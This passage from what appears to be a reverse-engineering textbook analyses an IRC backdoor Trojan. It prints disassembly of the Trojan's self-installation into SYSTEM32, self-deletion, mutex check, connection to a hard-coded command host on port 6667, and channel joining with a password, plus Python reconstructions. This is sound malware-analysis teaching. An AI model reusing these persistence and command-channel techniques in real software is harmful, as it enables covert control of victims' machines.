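    (pe_offset,) = struct.unpack_from("<I", image, 0x3C)    # e_lfanew
    if image[pe_offset:pe_offset + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # The COFF file header follows the 4-byte signature.
    (num_sections,) = struct.unpack_from("<H", image, pe_offset + 6)
    (opt_size,) = struct.unpack_from("<H", image, pe_offset + 20)
    table = pe_offset + 24 + opt_size                       # first section header
    names = []
    for i in range(num_sections):
        start = table + i * 40                              # each header is 40 bytes
        raw = image[start:start + 8]                        # 8-byte name field
        names.append(raw.rstrip(b"\0").decode("ascii", "replace"))
    return names


def looks_upx_packed(names) -> bool:
    """Heuristic only: flag section names that start with 'UPX'."""
    return any(name.startswith("UPX") for name in names)
```

Run against the section names from Listing 8.1 (.rsrc, UPX0, UPX1), looks_upx_packed returns True; a conventional layout with .text and .data does not trigger it.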

A quick online search reveals that UPX is an open-source executable packer. An executable packer is a program that compresses or encrypts an executable program in place, meaning that the transformation is transparent to the end user—the program is automatically restored to its original state in memory as soon as it is launched. Some packers are designed as antireversing tools that encrypt the program and try to fend off debuggers and disassemblers. Others simply compress the program for the purpose of decreasing the binary file size. UPX belongs to the second group, and is not designed as an antireversing tool, but simply as a compression tool. It makes sense for this type of Trojan/Backdoor to employ UPX in order to keep its file size as small as possible.

You can verify this assumption by downloading the latest beta version of UPX for Windows (note that the Backdoor uses the latest UPX beta, and that the most recent public release at the time of writing, version 1.25, could not identify the file). You can run UPX on the Backdoor executable with the -l switch so that UPX displays compression information for the Backdoor file.

Ultimate Packer for eXecutables
     Copyright (C) 1996, 1997, 1998, 1999, 2000, 2001, 2002, 2003, 2004
UPX 1.92 beta    Markus F.X.J. Oberhumer & Laszlo Molnar   Jul 20th 2004
         File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
     27680 ->  18976   68.55%    win32/pe     Webcam Shots.scr

As expected, the Backdoor is packed with UPX, and is actually about 9 KB lighter because of it. Even though UPX is not designed as an antireversing tool, it is going to be slightly annoying to reverse this program in its compressed form. You can avoid the problem by asking UPX to permanently decompress the file and then reversing the decompressed version. This is done by running UPX again, this time with the -d switch, which replaces the compressed file with a decompressed version that is functionally identical to it. At this point, it would be wise to rerun DUMPBIN and see whether you get a better result this time. Listing 8.2 contains the DUMPBIN output for the decompressed version.

Example 8.2. DUMPBIN output for the decompressed version of the Backdoor program.

Dump of file Webcam Shots.scr

  Section contains the following imports:

    KERNEL32.DLL
                    0 DeleteFileA
                    0 ExitProcess
                    0 ExpandEnvironmentStringsA
                    0 FreeLibrary
                    0 GetCommandLineA
                    0 GetLastError
                    0 GetModuleFileNameA
                    0 GetModuleHandleA
                    0 GetProcAddress
                    0 GetSystemDirectoryA
                    0 CloseHandle
                    0 GetTempPathA
                    0 GetTickCount
                    0 GetVersionExA
                    0 LoadLibraryA
                    0 CopyFileA
                    0 OpenProcess
                    0 ReleaseMutex
                    0 RtlUnwind
                    0 CreateFileA
                    0 Sleep
                    0 TerminateProcess
                    0 TerminateThread
                    0 WriteFile
                    0 CreateMutexA
                    0 CreateThread

     ADVAPI32.DLL
                    0 GetUserNameA
                    0 RegDeleteValueA
                    0 RegCreateKeyExA
                    0 RegCloseKey
                    0 RegQueryValueExA
                    0 RegSetValueExA

     CRTDLL.DLL
                    0 __GetMainArgs
                    0 atoi
                    0 exit
                    0 free
                    0 malloc
                    0 memset
                    0 printf
                    0 raise
                    0 rand
                    0 signal
                    0 sprintf
                    0 srand
                    0 strcat
                    0 strchr
                    0 strcmp
                    0 strncpy
                    0 strstr
                    0 strtok

     SHELL32.DLL
                    0 ShellExecuteA

     USER32.DLL
                    0 CharUpperBuffA

    WININET.DLL
                    0 InternetCloseHandle
                    0 InternetGetConnectedState
                    0 InternetOpenA
                    0 InternetOpenUrlA
                    0 InternetReadFile

     WS2_32.DLL
                    0 WSACleanup
                    0 listen
                    0 ioctlsocket
                    0 inet_addr
                    0 htons
                    0 getsockname
                    0 socket
                    0 gethostbyname
                    0 gethostbyaddr
                    0 connect
                    0 closesocket
                    0 bind
                    0 accept
                    0 __WSAFDIsSet
                    0 WSAStartup
                    0 send
                    0 select
                    0 recv

   Summary

         1000 .bss
         1000 .data
         1000 .idata
         3000 .rsrc
         3000 .text

That's more like it. Now you can see exactly which functions are used by the program, and reversing it is going to be a more straightforward task. Keep in mind that in some cases automatically unpacking the program is not going to be possible, and you would have to confront the packed program. This subject is discussed in depth in Part III of this book. For now let's start by running the program and trying to determine what it does. Needless to say, this should only be done in a controlled environment, on an isolated system that doesn't contain any valuable data or programs. There's no telling what this program is liable to do.

Initial Impressions

When launching the Webcam Shots.scr file, the first thing you'll notice is that nothing happens. That's the way it should be: this program does not want to present itself to the end user in any way. It was made to be invisible. If the program's authors wanted the program to be even more convincing and effective, they could have embedded an actual image file into this executable, and immediately extracted and shown it when the program is first launched. This way the user would never suspect that anything was wrong because the image would be properly displayed. By not doing anything when the user clicks on this file the program might be exposing itself, but then again the typical victims of these kinds of programs are usually nontechnical users who aren't sure exactly what to expect from the computer at any given moment in time. They'd probably think that the reason the image didn't appear was their own fault.

The first actual change that takes place after the program is launched is that the original executable is gone from the directory where it was launched! The task list in Task Manager (or any other process list viewer) seems to contain a new and unidentified process called ZoneLockup.exe. (The machine I was running this on was a freshly installed, clean Windows 2000 system with almost no additional programs installed, so it was easy to detect the newly created process.) The file's name is clearly designed to fool naïve users into thinking that this process is some kind of a security component.

If you launch a more powerful process viewer such as the Sysinternals Process Explorer (available from www.sysinternals.com), you can examine the full path of the ZoneLockup.exe process. It looks like the program has placed itself in the SYSTEM32 directory of the currently running OS (in my case this was C:\WINNT\SYSTEM32).

The Initial Installation

Let's take a quick look at the code that executes when we initially run this program, because it is the closest thing this program has to an installation program. This code is presented in Listing 8.3.

Example 8.3. The backdoor program's installation function.

00402621  PUSH EBP
00402622  MOV EBP,ESP
00402624  SUB ESP,42C
0040262A  PUSH EBX
0040262B  PUSH ESI
0040262C  PUSH EDI
0040262D  XOR ESI,ESI
0040262F  PUSH 104                     ; BufSize = 104 (260.)
00402634  PUSH ZoneLock.00404540       ; PathBuffer = ZoneLock.00404540
00402639  PUSH 0                       ; hModule = NULL
0040263B  CALL <JMP.&KERNEL32.GetModuleFileNameA>
00402640  PUSH 104                     ; BufSize = 104 (260.)
00402645  PUSH ZoneLock.00404010       ; Buffer = ZoneLock.00404010
0040264A  CALL <JMP.&KERNEL32.GetSystemDirectoryA>
0040264F  PUSH ZoneLock.00405544       ; src = "\"
00402654  PUSH ZoneLock.00404010       ; dest = "C:\WINNT\system32"
00402659  CALL <JMP.&CRTDLL.strcat>
0040265E  ADD ESP,8
00402661  LEA ECX,DWORD PTR DS:[404540]
00402667  OR EAX,FFFFFFFF
0040266A  INC EAX
0040266B  CMP BYTE PTR DS:[ECX+EAX],0
0040266F  JNZ SHORT ZoneLock.0040266A
00402671  MOV EBX,EAX
00402673  PUSH EBX                     ; Count
00402674  PUSH ZoneLock.00404540       ; String = "C:\WINNT\SYSTEM32\ZoneLockup.exe"
00402679  CALL <JMP.&USER32.CharUpperBuffA>
0040267E  LEA ECX,DWORD PTR DS:[404010]
00402684  OR EAX,FFFFFFFF
00402687  INC EAX
00402688  CMP BYTE PTR DS:[ECX+EAX],0
0040268C  JNZ SHORT ZoneLock.00402687
0040268E  MOV EBX,EAX
00402690  PUSH EBX                     ; Count
00402691  PUSH ZoneLock.00404010       ; String = "C:\WINNT\system32"
00402696  CALL <JMP.&USER32.CharUpperBuffA>
0040269B  PUSH 0
0040269D  CALL ZoneLock.004019CB
004026A2  ADD ESP,4
004026A5  PUSH ZoneLock.00404010       ; s2 = "C:\WINNT\system32"
004026AA  PUSH ZoneLock.00404540       ; s1 = "C:\WINNT\SYSTEM32\ZoneLockup.exe"
004026AF  CALL <JMP.&CRTDLL.strstr>
004026B4  ADD ESP,8
004026B7  CMP EAX,0
004026BA  JNZ SHORT ZoneLock.00402736
004026BC  PUSH ZoneLock.00405094       ; src = "ZoneLockup.exe"
004026C1  PUSH ZoneLock.00404010       ; dest = "C:\WINNT\system32"
004026C6  CALL <JMP.&CRTDLL.strcat>
004026CB  ADD ESP,8
004026CE  MOV EDI,0
004026D3  JMP SHORT ZoneLock.004026E0
004026D5  PUSH 1F4                     ; Timeout = 500. ms
004026DA  CALL <JMP.&KERNEL32.Sleep>
004026DF  INC EDI
004026E0  PUSH 0                       ; FailIfExists = FALSE
004026E2  PUSH ZoneLock.00404010       ; NewFileName = "C:\WINNT\system32"
004026E7  PUSH ZoneLock.00404540       ; ExistingFileName = "C:\WINNT\SYSTEM32\ZoneLockup.exe"
004026EC  CALL <JMP.&KERNEL32.CopyFileA>
004026F1  OR EAX,EAX
004026F3  JNZ SHORT ZoneLock.004026FA
004026F5  CMP EDI,5
004026F8  JL SHORT ZoneLock.004026D5
004026FA  PUSH ZoneLock.00404540       ; <%s> =  "C:\WINNT\SYSTEM32\ZoneLockup.exe"
004026FF  PUSH ZoneLock.0040553D       ; format = "qwer%s"
00402704  LEA EAX,DWORD PTR SS:[EBP-29C]
0040270A  PUSH EAX                     ; s
0040270B  CALL <JMP.&CRTDLL.sprintf>
00402710  ADD ESP,0C
00402713  PUSH 5                       ; IsShown = 5
00402715  PUSH 0                       ; DefDir = NULL
00402717  LEA EAX,DWORD PTR SS:[EBP-29C]
0040271D  PUSH EAX                     ; Parameters
0040271E  PUSH ZoneLock.00404010       ; FileName = "C:\WINNT\system32"
00402723  PUSH ZoneLock.00405696       ; Operation = "open"
00402728  PUSH 0                       ; hWnd = NULL
0040272A  CALL <JMP.&SHELL32.ShellExecuteA>
0040272F  PUSH 0                       ; ExitCode = 0
00402731  CALL <JMP.&KERNEL32.ExitProcess>
00402736  CALL <JMP.&KERNEL32.GetCommandLineA>
0040273B  PUSH ZoneLock.00405538       ; s2 = "qwer"
00402740  PUSH EAX                     ; s1
00402741  CALL <JMP.&CRTDLL.strstr>
00402746  ADD ESP,8
00402749  MOV ESI,EAX
0040274B  OR ESI,ESI
0040274D  JE SHORT ZoneLock.00402775
0040274F  MOV ECX,ESI
00402751  OR EAX,FFFFFFFF
00402754  INC EAX
00402755  CMP BYTE PTR DS:[ECX+EAX],0
00402759  JNZ SHORT ZoneLock.00402754
0040275B  CMP EAX,8
0040275E  JBE SHORT ZoneLock.00402775
00402760  PUSH 7D0                     ; Timeout = 2000. ms
00402765  CALL <JMP.&KERNEL32.Sleep>
0040276A  MOV EAX,ESI
0040276C  ADD EAX,4
0040276F  PUSH EAX                     ; FileName
00402770  CALL <JMP.&KERNEL32.DeleteFileA>
00402775  PUSH ZoneLock.004050A3       ; MutexName = "botsmfdutpex"
0040277A  PUSH 1                       ; InitialOwner = TRUE
0040277C  PUSH 0                       ; pSecurity = NULL
0040277E  CALL <JMP.&KERNEL32.CreateMutexA>
00402783  MOV DWORD PTR DS:[404650],EAX
00402788  CALL <JMP.&KERNEL32.GetLastError>
0040278D  CMP EAX,0B7
00402792  JNZ SHORT ZoneLock.0040279B
00402794  PUSH 0                       ; ExitCode = 0
00402796  CALL <JMP.&KERNEL32.ExitProcess>

When the program is first launched, it runs some checks to see whether it has already been installed, and if not it installs itself. This is done by calling GetModuleFileName to obtain the primary executable's file name, and checking whether the system's SYSTEM32 directory name is part of the path. If the program has not yet been installed, it proceeds to copy itself to the SYSTEM32 directory under the name ZoneLockup.exe, launches that executable, and terminates itself by calling ExitProcess.
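The decision logic in Listing 8.3 is easier to follow in a high-level form. The following Python sketch is my own reconstruction of what the listing does, not the Trojan's source code: the function names inline_strlen and is_installed are hypothetical, and only the string handling is modeled (no files are copied or launched).

```python
def inline_strlen(buf: bytes) -> int:
    """Mirror the OR EAX,-1 / INC EAX / CMP BYTE PTR [ECX+EAX],0 / JNZ idiom.

    EAX starts at -1 and is incremented until it indexes the terminating
    zero byte, which makes it the string length.
    """
    eax = -1
    while True:
        eax += 1
        if buf[eax] == 0:
            return eax


def is_installed(module_path: str, system_dir: str) -> bool:
    """True if the running image already lives under the system directory."""
    prefix = system_dir + "\\"                 # strcat(system_dir, "\\")
    # CharUpperBuffA is applied to both buffers before the strstr call,
    # so the comparison is effectively case-insensitive.
    return prefix.upper() in module_path.upper()
```

With the paths from the listing, is_installed(r"C:\WINNT\SYSTEM32\ZoneLockup.exe", r"C:\WINNT\system32") takes the "already installed" branch (the jump to 00402736), while a copy launched from any other directory falls through to the CopyFileA loop.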

The new instance of the process is obviously going to run this exact same code, except this time the SYSTEM32 check will find that the program is already running from SYSTEM32 and will wind up running the code at 00402736. This sequence checks whether this is the first time that the program is launched from its permanent habitat. This is done by checking a special flag qwer set in the command-line parameters that also includes the full path and name of the original Trojan executable that was launched (this is going to be something like Webcam Shots.scr). The program needs this information so that it can delete this file; there is no reason to keep the original executable in place after the ZoneLockup.exe is created and launched.

If you're wondering why this file name was passed into the new instance instead of just deleting it in the previous instance, there is a simple answer: It wouldn't have been possible to delete the executable while the program was still running, because Windows locks executable files while they are loaded into memory. The program had to launch a new instance, terminate the first one, and delete the original file from this new instance.
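The command-line check at 00402736 boils down to a few lines of string handling. Here is a minimal Python sketch of it, covering the parsing only; the function name original_path_from_cmdline is hypothetical, and the exact shape of the command line that ShellExecuteA produces is an assumption on my part.

```python
from typing import Optional

FLAG = "qwer"   # the marker the installer prepends to the original path


def original_path_from_cmdline(cmdline: str) -> Optional[str]:
    """Return the path that follows the flag, or None if there is nothing to use."""
    pos = cmdline.find(FLAG)              # strstr(cmdline, "qwer")
    if pos < 0:
        return None                       # JE: flag not present
    tail = cmdline[pos:]
    if len(tail) <= 8:                    # CMP EAX,8 / JBE: too short to be a path
        return None
    return tail[len(FLAG):]               # ESI + 4 skips the four flag characters
```

In the listing, the value computed this way is what gets passed to DeleteFileA after the 2-second Sleep, which gives the first instance time to exit and release its executable.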

The function proceeds to create a mutex called botsmfdutpex, whatever that means. The purpose of this mutex is to make sure no other instances of the program are already running: if GetLastError returns 0xB7 (ERROR_ALREADY_EXISTS) after the CreateMutexA call, the mutex already exists and the program terminates. This mechanism ensures that the program doesn't try to infect the same host twice.

Initializing Communications

The next part of this function is a bit too long to print here, but it's easily readable: It collects several bits of information regarding the host, including the exact version of the operating system, and the currently logged-on user. This is followed by what is essentially the program's main loop, which is printed in Listing 8.4.

Example 8.4. The Backdoor program's primary network connection check loop.

00402939  /PUSH 0
0040293B  |LEA EAX,DWORD PTR SS:[EBP-4]
0040293E  |PUSH EAX
0040293F  |CALL <JMP.&WININET.InternetGetConnectedState>
00402944  |OR EAX,EAX
00402946  |JNZ SHORT ZoneLock.00402954
00402948  |PUSH 7530                   ; Timeout = 30000. ms
0040294D  |CALL <JMP.&KERNEL32.Sleep>
00402952  |JMP SHORT ZoneLock.0040299A
00402954  |CMP DWORD PTR DS:[EDI*4+405104],0
0040295C  |JNZ SHORT ZoneLock.00402960
0040295E  |XOR EDI,EDI
00402960  |PUSH DWORD PTR DS:[EDI*4+40510C]
00402967  |PUSH DWORD PTR DS:[EDI*4+405104]
0040296E  |CALL ZoneLock.004029B1
00402973  |ADD ESP,8
00402976  |MOV ESI,EAX
00402978  |CMP ESI,1
0040297B  |JNZ SHORT ZoneLock.0040298A
0040297D  |PUSH DWORD PTR DS:[40464C]  ; Timeout = 0. ms
00402983  |CALL <JMP.&KERNEL32.Sleep>
00402988  |JMP SHORT ZoneLock.00402990
0040298A  |CMP ESI,3
0040298D  |JE SHORT ZoneLock.0040299C
0040298F  |INC EDI
00402990  |PUSH 1388                   ; /Timeout = 5000. ms
00402995  |CALL <JMP.&KERNEL32.Sleep>
0040299A  \JMP SHORT ZoneLock.00402939

The first thing you'll notice about this code sequence is that it is a loop, probably coded as an infinite loop (such as a while(1) statement). In its first phase, the loop repeatedly calls the InternetGetConnectedState API and sleeps for 30 seconds if the API returns FALSE. As you've probably guessed, the InternetGetConnectedState API checks whether the computer is currently connected to the Internet. In reality, this API only checks whether the system has a valid IP address; it doesn't really check that it is connected to the Internet. It looks as if the program is checking for a network connection and is simply waiting for the system to become connected if it's not already connected.
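The control flow of Listing 8.4 can be modeled in a few lines. The following Python sketch is a reconstruction for study purposes, with every side effect injected as a callable so that nothing touches the network. The names connection_loop, is_connected, try_server, and retry_delay_ms are hypothetical. The listing indexes separate tables with EDI; pairing each host with a port and ending the list with a (None, None) entry is my simplification. What the return values 1 and 3 of the function at 004029B1 actually mean is not established by the listing.

```python
def connection_loop(is_connected, try_server, sleep, servers, retry_delay_ms):
    """Model of the loop in Listing 8.4.

    is_connected   stands in for InternetGetConnectedState
    try_server     stands in for the function at 004029B1
    sleep          stands in for Sleep (argument in milliseconds)
    servers        list of (host, port) pairs ending with (None, None)
    retry_delay_ms stands in for the value read from 0040464C
    """
    index = 0                                  # EDI
    while True:
        if not is_connected():
            sleep(30000)                       # wait 30 seconds and re-check
            continue
        if servers[index][0] is None:          # end of table: wrap to the start
            index = 0
        host, port = servers[index]
        result = try_server(host, port)
        if result == 3:
            return                             # the only exit from the loop
        if result == 1:
            sleep(retry_delay_ms)              # same entry is retried next time
        else:
            index += 1                         # move on to the next entry
        sleep(5000)
```

Driving the model with a fake try_server that returns a scripted series of values is a convenient way to convince yourself which paths sleep, which advance the index, and which leave the loop.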

Once the connection check succeeds, the function calls another function, 004029B1, with the first parameter being a pointer to the hard-coded string g.hackarmy.tk, and with the second parameter being 0x1A0B (6667 in decimal). This function immediately calls into a function at 0040129C, which calls the gethostbyname WinSock2 function on that g.hackarmy.tk string, and proceeds to call the connect function to connect to that address. The port number is set to the value from the second parameter passed earlier: 6667. In case you're not sure what this port number is used for, a quick trip to the IANA Web site (the Internet Assigned Numbers Authority) at www.iana.org shows that ports 6665 through 6669 are registered for IRCU, the Internet Relay Chat services.

It looks like the Trojan is looking to chat with someone. Care to guess with whom? Here's a hint: he's wearing a black hat. Well, at least in security book illustrations he does; it's actually more likely that he's just a bored teenager wearing a baseball cap. Regardless, the program is clearly trying to connect to an IRC server in order to communicate with an attacker who is most likely its original author. The specific address being referenced is g.hackarmy.tk, which was invalid at the time of writing (and is most likely going to remain invalid). This address was probably unregistered very early on, as soon as the antivirus companies discovered that it was being used for backdoor access to infected machines. You can safely assume that this address originally pointed to some IRC server, either one set up specifically for this purpose or one of the many legitimate public servers.

Connecting to the Server

To really test the Trojan's backdoor capabilities, I set up an IRC server on a separate virtual machine and named it g.hackarmy.tk, so that the Trojan connects to it when it is launched. You're welcome to try this out if you want, but you're probably going to learn plenty by just reading through my account of this experience. To make this reversing session truly effective, I combined a conventional reversing session with some live chats with the backdoor through IRC.

Stepping through the code that follows the connection of the socket, you can see a function that seems somewhat interesting and unusual, shown in Listing 8.5.

Example 8.5. A random string-generation function.

004014EC  PUSH EBP
004014ED  MOV EBP,ESP
004014EF  PUSH EBX
004014F0  PUSH ESI
004014F1  PUSH EDI
004014F2  CALL <JMP.&KERNEL32.GetTickCount>
004014F7  PUSH EAX                     ; seed
004014F8  CALL <JMP.&CRTDLL.srand>
004014FD  POP ECX
004014FE  CALL <JMP.&CRTDLL.rand>
00401503  MOV EDX,EAX
00401505  AND EDX,80000003
0040150B  JGE SHORT ZoneLock.00401512
0040150D  DEC EDX
0040150E  OR EDX,FFFFFFFC
00401511  INC EDX
00401512  MOV EBX,EDX
00401514  ADD EBX,4
00401517  MOV ESI,0
0040151C  JMP SHORT ZoneLock.00401535
0040151E  CALL <JMP.&CRTDLL.rand>
00401523  MOV EDI,DWORD PTR SS:[EBP+8]
00401526  MOV ECX,1A
0040152B  CDQ
0040152C  IDIV ECX
0040152E  ADD EDX,61
00401531  MOV BYTE PTR DS:[EDI+ESI],DL
00401534  INC ESI
00401535  CMP ESI,EBX
00401537  JLE SHORT ZoneLock.0040151E
00401539  MOV EAX,DWORD PTR SS:[EBP+8]
0040153C  MOV BYTE PTR DS:[EAX+ESI],0
00401540  POP EDI
00401541  POP ESI
00401542  POP EBX
00401543  POP EBP
00401544  RETN

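This function generates random data, seeding the generator with the current tick count. The buffer length is itself somewhat random. The sequence from 00401505 through 00401511 is the compiler's idiom for a signed modulo 4 of the value returned from rand. The function adds 4 to that remainder and uses the sum as an inclusive loop bound, so the loop stores one character more than the bound. For a nonnegative rand result this yields 5 to 8 bytes, and a negative result would yield as few as 2. Because the C runtime's rand never returns a negative number, the shorter lengths don't occur in practice. Once the primary loop is entered, the function computes a random number for each byte, calculates a modulo 0x1A (26 in decimal) for each random number, adds 0x61 (97 in decimal), and stores the result in the current byte in the buffer.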

Observing the resulting buffer in OllyDbg exposes that the program is essentially producing a short random string that is made up of lowercase letters, and that the string is placed inside the caller-supplied buffer.
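The following Python sketch emulates Listing 8.5 so that you can experiment with it outside the debugger. It is a reconstruction from the disassembly, not the author's source; the names signed_mod4 and random_name are hypothetical, and rand is any zero-argument callable that stands in for the C runtime's rand (assumed to return a nonnegative integer).

```python
def signed_mod4(value: int) -> int:
    """Emulate AND EDX,80000003 / JGE / DEC EDX / OR EDX,FFFFFFFC / INC EDX.

    This is the compiler's branch-based idiom for a signed 32-bit 'value % 4'
    with C semantics (the result takes the sign of the dividend).
    """
    edx = value & 0x80000003
    if edx & 0x80000000:                       # sign bit set: JGE not taken
        edx = (edx - 1) & 0xFFFFFFFF
        edx |= 0xFFFFFFFC
        edx = (edx + 1) & 0xFFFFFFFF
    # Reinterpret the 32-bit pattern as a signed integer.
    return edx - 0x100000000 if edx & 0x80000000 else edx


def random_name(rand) -> str:
    """Build the lowercase string the same way the loop at 0040151E does."""
    bound = signed_mod4(rand()) + 4            # EBX
    chars = []
    i = 0                                      # ESI
    while i <= bound:                          # JLE: the bound itself is included
        chars.append(chr(rand() % 26 + 0x61))  # remainder of IDIV by 0x1A, plus 'a'
        i += 1
    return "".join(chars)
```

Passing random_name a callable that replays a fixed series of numbers makes the length rule easy to check: the first number decides the length, and each later one selects a letter.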

Note

Notice how the modulo in Listing 8.5 is computed using the highly inefficient IDIV instruction. This indicates that the Trojan was compiled with some kind of Minimize Size compiler option (assuming that it was written in a high-level language). If the compiler was aiming at generating high-performance code, it would have used reciprocal multiplication to compute the modulo, which would have produced far longer, yet faster code. This is not surprising considering that the program originally came packed with UPX: the author of this program was clearly aiming at making the executable as tiny as possible. For more information on how to identify optimized division sequences and other common arithmetic operations, refer to Appendix B.

The next sequence takes the random string and produces a string that is later sent to the IRC server. Let's take a look at that code.

00402ABB  PUSH EAX                     ; <%s>
00402ABC  PUSH ZoneLock.0040519E       ; <%s> = "USER"
00402AC1  LEA EAX,DWORD PTR SS:[EBP-204]
00402AC7  PUSH EAX                     ; <%s>
00402AC8  PUSH ZoneLock.00405199       ; <%s> = "NICK"
00402ACD  PUSH ZoneLock.004054C5       ; format = "%s %s %s %s "x.com" "x" :x"
00402AD2  LEA EAX,DWORD PTR SS:[EBP-508]
00402AD8  PUSH EAX                     ; s
00402AD9  CALL <JMP.&CRTDLL.sprintf>

Considering that EAX contains the address of the randomly generated string, you should now know exactly what that string is for: it is the user name the backdoor will be using when connecting to the server.

The preceding sequence produced the following message, and will always produce the same message—the only difference is going to be the randomly generated name string.

NICK vsorpy USER vsorpy "x.com" "x" :x

If you look at RFC 1459, the IRC protocol specifications, you can see that this string means that a new user called vsorpy is being registered with the server. This username is going to represent this particular system in the IRC chat. The random-naming scheme was probably created in order to enable multiple clients to connect to the same server without conflicts. The architecture actually supports convenient communication with multiple infected systems at the same time.
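The sprintf call is simple enough to replay. The sketch below uses the format string exactly as it appears in the listing; the names REGISTER_FORMAT and registration_line are hypothetical. RFC 1459 defines NICK and USER as separate messages, so the real format string presumably contains a line break that the debugger comment doesn't show. That is an assumption, and the sketch follows the listing as printed.

```python
# Format string as shown in the listing's sprintf comment.
REGISTER_FORMAT = '%s %s %s %s "x.com" "x" :x'


def registration_line(nick: str) -> str:
    """Fill the format in the order the sprintf call receives its arguments."""
    return REGISTER_FORMAT % ("NICK", nick, "USER", nick)
```

In RFC 1459 terms, the USER parameters are the username (the random string again), a hostname ("x.com"), a server name ("x"), and a real name (x). The only field that ever changes is the random name.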

Joining the Channel

After connecting to the IRC server, the program and the IRC server enter into a brief round of standard IRC protocol communications that is just typical protocol handshaking. The next important event takes place when the IRC server notifies the client whether or not the server has a MOTD (Message of the Day) set up. Based on this information, the program enters into the code sequence that follows, which decides how to enter into the communications channels inside which the attacker will be communicating with the Backdoor.

00402D80  JBE SHORT ZoneLock.00402DA7
00402D82  PUSH ZoneLock.004050B6       ; <%s> = "grandad"
00402D87  PUSH ZoneLock.004050B0       ; <%s> = "##g##"
00402D8C  PUSH ZoneLock.004051A3       ; <%s> = "JOIN"
00402D91  PUSH ZoneLock.004054AC       ; format = "%s %s %s"
00402D96  LEA EAX,DWORD PTR SS:[EBP-260]
00402D9C  PUSH EAX                     ; s
00402D9D  CALL <JMP.&CRTDLL.sprintf>
00402DA2  ADD ESP,14
00402DA5  JMP SHORT ZoneLock.00402DC5
00402DA7  PUSH ZoneLock.004050B0       ; <%s> = "##g##"
00402DAC  PUSH ZoneLock.004051A3       ; <%s> = "JOIN"
00402DB1  PUSH ZoneLock.004054BE       ; format = "%s %s"
00402DB6  LEA EAX,DWORD PTR SS:[EBP-260]
00402DBC  PUSH EAX                     ; s
00402DBD  CALL <JMP.&CRTDLL.sprintf>

In the preceding sequence, the first sprintf will only be called if the server sends an MOTD, and the second one will be called if it doesn't. The two commands both join the same channel: ##g##, but if the server has an MOTD the channel will be joined with the password grandad. At this point, you can start your initial communications with the program by pretending to be the attacker and joining into a channel called ##g## on the private IRC server. As soon as you join, you will know that your friend is already there because other than your own nickname you can also see an additional random-sounding name that's connected to this channel. That's the Backdoor program.
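The two branches differ only in whether a channel key is appended, which a short Python sketch makes plain. The names CHANNEL, CHANNEL_KEY, and join_command are hypothetical, and the server_has_motd flag simply encodes the condition as described above, since the comparison that feeds the JBE instruction is not part of the excerpt.

```python
CHANNEL = "##g##"
CHANNEL_KEY = "grandad"


def join_command(server_has_motd: bool) -> str:
    """Return the JOIN line built by whichever sprintf call is taken."""
    if server_has_motd:
        # First branch: format "%s %s %s" (command, channel, key).
        return "%s %s %s" % ("JOIN", CHANNEL, CHANNEL_KEY)
    # Second branch: format "%s %s" (command, channel).
    return "%s %s" % ("JOIN", CHANNEL)
```

RFC 1459 defines the optional second JOIN parameter as the channel key, which is why grandad acts as the channel's password.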

It's obvious that the backdoor can be controlled by issuing commands inside of this private channel that you've established, but how can you know which commands are supported? Everything you've learned so far could have been gathered with a simple network monitor, but the list of supported commands could not. For that, you must look at the command-processing code and determine which commands the program supports.

Communicating with the Backdoor

In communicating with the backdoor, the most important code area is the one that processes private-message packets, because that's how the attacker controls the program: through private message. It is quite easy to locate the code in the program that checks for a case where the PRIVMSG command is sent from the server. This will be helpful because you're expecting the code that follows this check to contain the actual parsing of commands from the attacker. The code that follows contains the only direct reference in the program to the PRIVMSG string.

00402E82  PUSH DWORD PTR SS:[EBP-C]                ; s2
00402E85  PUSH ZoneLock.0040518A                   ; s1 = "PRIVMSG"
00402E8A  CALL <JMP.&CRTDLL.strcmp>                ; strcmp
00402E8F  ADD ESP,8
00402E92  OR EAX,EAX
00402E94  JNZ ZoneLock.00402F8F
00402E9A  PUSH ZoneLock.004054A7                   ; s2 = " :"
00402E9F  MOV EAX,DWORD PTR SS:[EBP+8]             ;
00402EA2  INC EAX                                  ;
00402EA3  PUSH EAX                                 ; s1
00402EA4  CALL <JMP.&CRTDLL.strstr>                ; strstr
00402EA9  ADD ESP,8
00402EAC  MOV EDX,EAX
00402EAE  ADD EDX,2
00402EB1  MOV ESI,EDX
00402EB3  JNZ SHORT ZoneLock.00402EBC
00402EB5  XOR EAX,EAX
00402EB7  JMP ZoneLock.00403011
00402EBC  MOVSX EAX,BYTE PTR DS:[ESI]
00402EBF  MOVSX EDX,BYTE PTR DS:[4050C5]
00402EC6  CMP EAX,EDX
00402EC8  JE SHORT ZoneLock.00402ED1
00402ECA  XOR EAX,EAX

After confirming that the command string is actually PRIVMSG, the program skips the colon character that denotes the beginning of the message (in the strstr call), and proceeds to compare the first character of the actual message with a character from 004050C5. When you look at that memory address in the debugger, you can see that it appears to contain a hard-coded exclamation mark (!) character. If the first character is not an exclamation mark, the program exits the function and goes back to wait for the next server transmission. So, it looks as if backdoor commands start with an exclamation mark. The next code sequence appears to perform another kind of check on your private messages. Let's take a look.
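Here is the same filtering logic as a minimal Python sketch. It is a reconstruction from the listing rather than the program's source: the names COMMAND_PREFIX and extract_command are hypothetical, and splitting the line on spaces to find the command token is my assumption (the listing compares a token that was parsed earlier, outside the excerpt).

```python
from typing import Optional

COMMAND_PREFIX = "!"      # the character the listing reads from 004050C5


def extract_command(line: str) -> Optional[str]:
    """Return the message text if it looks like a backdoor command, else None.

    line is one raw server line such as
    ":nick!user@host PRIVMSG ##g## :!some text".
    """
    parts = line.split(" ")
    if len(parts) < 2 or parts[1] != "PRIVMSG":   # strcmp against "PRIVMSG"
        return None
    pos = line.find(" :", 1)                      # strstr(line + 1, " :")
    if pos < 0:
        return None
    message = line[pos + 2:]                      # skip the space and the colon
    if not message.startswith(COMMAND_PREFIX):    # first character must be '!'
        return None
    return message
```

Starting the search at offset 1 mirrors the INC EAX before the strstr call, which steps over the colon that opens the sender prefix so that only the " :" introducing the message text can match.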

00402EED  XOR EDI,EDI
00402EEF  LEA EAX,DWORD PTR SS:[EBP-60]
00402EF2  PUSH EAX                                ; s2
00402EF3  IMUL EAX,EDI,50                         ;
00402EF6  LEA EAX,DWORD PTR DS:[EAX+4051C5]       ;
00402EFD  PUSH EAX                                ; s1
00402EFE  CALL <JMP.&CRTDLL.strcmp>               ; strcmp
00402F03  ADD ESP,8
00402F06  OR EAX,EAX
00402F08  JNZ SHORT ZoneLock.00402F0D
00402F0A  XOR EBX,EBX
00402F0C  INC EBX
00402F0D  INC EDI
